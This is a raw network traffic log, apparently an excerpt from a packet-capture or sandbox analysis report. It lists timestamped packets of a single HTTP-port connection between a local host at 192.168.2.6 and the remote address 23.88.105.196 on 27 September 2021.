Sep 27, 2021 18:33:08.437750101 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437768936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437777996 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437815905 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437839031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437844038 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437856913 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437858105 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437882900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437902927 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437926054 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437966108 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438018084 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438020945 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438070059 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438138008 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438162088 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438184977 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438185930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438206911 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438210964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438230991 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438234091 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438257933 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438258886 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438283920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438312054 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438318968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438342094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438366890 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438366890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438389063 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438390970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438414097 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438441992 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438477993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438527107 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438529015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438569069 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438580036 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438591003 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438613892 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438640118 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438646078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438714981 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438810110 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438823938 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438869953 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438886881 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438894987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438920975 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438922882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.438945055 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.438961983 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.439016104 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.439049959 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.439079046 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.439100981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.439104080 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.439150095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.439171076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.439196110 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.439218044 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.439228058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.439264059 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457298994 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457329035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457345009 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457361937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457411051 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457441092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457482100 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457499981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457520962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457530022 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457566977 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457611084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457629919 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457638979 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457648993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457665920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457679033 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457743883 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457752943 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457775116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457791090 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457803011 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457865000 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.457881927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.457937002 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458014011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458033085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458048105 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458085060 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458117008 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458132029 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458163977 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458178997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458198071 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458198071 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458215952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458252907 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458275080 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458304882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458307981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458358049 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458363056 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458406925 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458416939 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458471060 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458473921 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458489895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458520889 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458528996 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458550930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458570004 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458573103 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458607912 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458635092 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458648920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458697081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458735943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458746910 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458770037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458791971 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458802938 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458831072 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458842039 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458854914 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458877087 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458898067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.458899975 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458952904 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.458997965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459032059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459049940 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459054947 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459078074 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459105968 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459131002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459160089 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459208012 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459292889 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459317923 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459352970 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459362030 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459383011 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459422112 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459477901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459501028 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459523916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459532022 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459546089 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459570885 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459614038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459619045 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459649086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459662914 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459688902 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459696054 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459724903 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459733009 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459749937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459774017 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459815025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459844112 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459867954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459889889 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459897995 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459933043 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459966898 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.459973097 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.459995985 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460020065 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460021019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460042953 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460061073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460093975 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460166931 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460201979 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460225105 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460244894 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460278034 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460305929 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460330963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460351944 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460360050 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460412025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460439920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460464001 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460485935 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460494041 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460509062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460547924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460577965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460597992 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460650921 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460652113 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460681915 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460700989 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460720062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460742950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460772038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460772038 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460796118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460850000 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460874081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460884094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460917950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460939884 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.460947990 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.460963964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461002111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461038113 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461057901 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461064100 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461097002 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461131096 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461174011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461194038 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461199045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461222887 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461251020 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461302996 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461316109 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461388111 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461529016 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461566925 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461591959 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461592913 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461616039 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461632967 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461639881 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461659908 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.461674929 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.461728096 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.642503977 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.663970947 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664009094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664033890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664057970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664079905 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664104939 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664127111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664155006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664180994 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664203882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664227009 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664232016 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664252043 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664304018 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664330006 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664335966 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664369106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664396048 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664397001 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664426088 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664450884 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664483070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664508104 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664536953 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664549112 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664567947 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664577007 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664593935 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664603949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664622068 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664629936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664652109 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664657116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664683104 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664685011 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664707899 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664710999 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664735079 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664735079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664760113 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664761066 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664792061 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664803982 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664836884 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664858103 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664951086 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.664969921 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.664995909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665021896 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665049076 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665050030 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665096045 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665641069 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665668011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665692091 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665703058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665718079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665720940 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665744066 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665745020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665765047 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665771961 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665786028 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665800095 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665815115 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665826082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665837049 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665854931 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665865898 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665880919 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665900946 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665908098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665921926 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665932894 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665955067 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665957928 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.665971041 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.665983915 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666002035 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666008949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666023970 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666035891 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666053057 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666064978 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666074038 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666090965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666110039 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666115999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666135073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666141987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666153908 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666167974 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666186094 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666194916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666204929 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666223049 CEST	80	49741	23.88.105.196	192.168.2.6
